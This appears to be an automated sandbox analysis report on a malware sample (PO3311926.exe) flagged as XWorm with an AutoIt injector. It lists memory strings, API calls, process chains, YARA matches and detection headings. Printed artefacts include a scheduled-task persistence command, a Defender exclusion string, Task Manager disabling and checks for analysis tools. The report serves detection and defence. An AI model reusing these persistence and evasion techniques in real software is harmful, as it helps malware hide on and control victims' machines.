Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ini_settingsfile, hidd`	memstr_f6a107ea-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_folder{	memstr_00395157-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disabletaskmgr\microsou	memstr_64d8281f-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: variablesl	memstr_d176d7b8-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \start.cmd^	memstr_8c9cfca2-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ini_settingseturn = trq	memstr_d123d186-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: variablesnary	memstr_1dce7744-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: startupdir	memstr_15e26afd-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cmd_command_path	memstr_bd94e64e-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disabletaskmgr	memstr_4b895928-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \start.cmd	memstr_832abf10-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \mshta.exe	memstr_9539e917-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wscript.quit	memstr_7fbafc5b-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_foldercreateob	memstr_6190afe8-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: variablesciiarray	memstr_4476b9b8-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dword;int;dword;struct;ptr;int;int;int;ptr;endstruct,	memstr_ef3387c4-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: const waitonreturn = true	memstr_c8789ef7-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -command add-mppreference -exclusionpath	memstr_9b7804f7-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dword pointertosymboltable;ebx; dword edx; dword ecx; {	memstr_8444f224-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: word sizeofoptionalheader;j	memstr_be4adb53-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: set wshshell = wscript.createobject(e	memstr_3b80c087-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \microsoft.net\framework\v4.0.30319\applaunch.exet	memstr_47f964cc-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dword addressofnewexeheadert64 p2home; uint64 p3home;	memstr_b359621b-a

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_005FBB02 SendInput,keybd_event,

8_2_005FBB02

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_005FEBE5 mouse_event,

8_2_005FEBE5

Source: C:\Users\user\Desktop\PO3311926.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sdadbtvsh.bin nngqrvwq.xl	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin sdadbtvsh.bin nngqrvwq.xl	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_005F13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

8_2_005F13F2

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_005F1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

8_2_005F1EF3

Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C36000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: sdadbtvsh.bin.exe, 00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If WinGetText("Program Manager") = "0" ThenfE
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1599039739.0000000001739000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: sdadbtvsh.bin, sdadbtvsh.bin.exe	Binary or memory string: Shell_TrayWnd
Source: sdadbtvsh.bin, 00000008.00000002.1603220411.00000000016C8000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1744085917.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745967153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: nngqrvwq.xl.0.dr, nngqrvwq.xl.8.dr	Binary or memory string: If WinGetText("Program Manager") = "0" Then

Language, Device and Operating System Detection

Yara detected Autoit Injector

Source: Yara match	File source: 0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2205465079.0000000001757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2130760562.0000000001754000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin PID: 3232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin.exe PID: 6064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5924, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\wrse\nngqrvwq.xl, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RarSFX0\nngqrvwq.xl, type: DROPPED

Source: C:\Users\user\Desktop\PO3311926.exe

Code function: 0_2_00BBF654 cpuid

0_2_00BBF654

Source: C:\Users\user\Desktop\PO3311926.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00BBAF0F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation

Source: C:\Users\user\Desktop\PO3311926.exe

Code function: 0_2_00BBDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00BBDF1E

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_005EE5F8 GetUserNameW,

8_2_005EE5F8

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_005CBCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

8_2_005CBCF2

Source: C:\Users\user\Desktop\PO3311926.exe

Code function: 0_2_00BAB146 GetVersionExW,

0_2_00BAB146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: sdadbtvsh.bin.exe, 00000014.00000003.1752201411.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000002.1753734876.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1746299936.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1740437603.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AVGUI.exe
Source: sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2208129774.00000000017B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598450834.000000000175C000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598346984.000000000174F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954471926.0000000001608000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 21.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.2166043970.0000000001832000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2160394335.000000000182A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1557524427.00000000017C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1916712063.0000000004046000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1916641917.0000000001682000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1565296596.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1557460063.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1714503367.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2166138425.00000000041ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2160342151.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1702942543.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1703000356.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1565515689.0000000004098000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1693784199.0000000000E7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1916546017.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1906750023.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1702531700.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2165918664.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1693739321.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1565342745.00000000017AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1916582807.0000000001665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1906792983.000000000167B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1702562774.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2165964691.0000000001814000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin PID: 3232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin.exe PID: 6064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5924, type: MEMORYSTR

Source: sdadbtvsh.bin.exe	Binary or memory string: WIN_81
Source: sdadbtvsh.bin.exe	Binary or memory string: WIN_XP
Source: sdadbtvsh.bin.8.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: sdadbtvsh.bin.exe	Binary or memory string: WIN_XPe
Source: sdadbtvsh.bin.exe	Binary or memory string: WIN_VISTA
Source: sdadbtvsh.bin.exe	Binary or memory string: WIN_7
Source: sdadbtvsh.bin.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 21.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, type: UNPACKEDPE
